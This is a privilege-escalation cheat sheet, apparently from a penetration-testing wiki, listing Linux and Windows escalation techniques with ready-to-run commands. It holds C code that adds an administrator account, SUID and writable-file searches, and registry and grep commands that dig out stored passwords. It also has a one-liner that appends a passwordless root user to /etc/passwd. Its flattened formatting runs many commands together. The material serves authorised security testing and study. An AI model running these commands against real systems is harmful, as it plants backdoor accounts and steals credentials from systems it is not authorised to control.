Privilege Escalation¶
Privilege escalation means gaining higher levels of access or permissions within a system or network beyond what was initially granted. It involves exploiting vulnerabilities or misconfigurations to elevate privileges from a lower-privileged user or account to gain control over more sensitive resources or execute commands with increased authority.
Linux Privilege Escalation¶
- sudo -l
- Kernel Exploits
- OS Exploits
- Password reuse (mysql, .bash_history, 000-default.conf...)
- Known binaries with suid flag and interactive (nmap)
- Custom binaries with suid flag either using other binaries or with command execution
- Writable files owned by root that get executed (cronjobs)
- MySQL as root
- Vulnerable services (chkrootkit, logrotate)
- Writable /etc/passwd
- Readable .bash_history
- SSH private key
- Listening ports on localhost
- /etc/fstab
- /etc/exports
- /var/mail
- Process as other user (root) executing something you have permissions to modify
- SSH public key + Predictable PRNG
- apt update hooking (Pre-Invoke)
- Capabilities
Windows Privilege Escalation¶
- Kernel Exploits
- OS Exploits
- Pass The Hash
- Password reuse
- DLL hijacking (Path)
- Vulnerable services
- Writable services binaries path
- Unquoted services
- Listening ports on localhost
- Registry keys
Kernel Exploits¶
Linux: https://github.com/lucyoa/kernel-exploits
Windows: https://github.com/abatchy17/WindowsExploits
Windows Add User
#include /* system, NULL, EXIT_FAILURE */int main (){ int i; i=system ("net user /add && net localgroup administrators /add"); return 0;}
SUID Change
Privilege Escalation:
#Find Binaries that will execute as the ownerfind / -perm -u=s -type f 2>/dev/null
#Find binaries that will execute as the groupfind / -perm -g=s -type f 2>/dev/null
#Find sticky-bit binariesfind / -perm -1000 -type d 2>/dev/nullfind / -perm -4000 2>/dev/nullwritable by everyonefind / -writable -type f 2>/dev/nullWorld writeable directoriesfind / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v rootWorld writeable filesfind / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/nullWriteable config filesfind /etc/ -writable -type f 2>/dev/nullfind / -user root -perm -4000 -exec ls -ld {} \; 2> /dev/null
Window Exploit Suggester
python2 windows-exploit-suggester.py --database 2017-10-10-mssb.xls --systeminfo ../systeminfo.txt --quietpython windows-exploit-suggester.py –systeminfo systeminfo.txt –database 2018-11-25-mssb.xls
Windows Priv Escalation
AlwaysInstallElevatedCheck if the following registry settings are set to "1"reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevatedreg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevatedreg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
Basic Linux Enumeration
Distribution type & kernel versioncat /etc/*release*uname -arpm -q kerneldmesg | grep -i linuxDefault writeable directory / folder/tmp/dev/shmSearch for passwordsSearch for password within config.phpgrep -R 'password' config.phpFind possible other writeable directory / folderfind / -type d \( -perm -g+w -or -perm -o+w \) -exec ls -adl {} \;Service(s) running as root userps aux | grep rootps -ef | grep rootInstalled applicationsls -lah /usr/bin/ls -lah /sbin/dpkg -lrpm -qals -lah /var/cache/apt/archivesOls -lah /var/cache/yum/Scheduled jobscrontab -lls -la /etc/cron*ls -lah /var/spool/cronls -la /etc/ | grep croncat /etc/crontabcat /etc/anacrontabFind pattern in file:grep -rnw '/etc/passwd' -e 'root'Sticky bit, SGID, SUID, GUIDSticky bitfind / -perm -1000 -type d 2>/dev/nullSGID (chmod 2000)find / -perm -g=s -type f 2>/dev/nullSUID (chmod 4000)find / -perm -u=s -type f 2>/dev/nullfind /* -user root -perm -4000 -print 2>/dev/nullSUID or GUIDfind / -perm -g=s -o -perm -u=s -type f 2>/dev/nullAdd user to /etc/passwd and root groupecho hodor::0:0:root:/root:/bin/bash >> /etc/passwd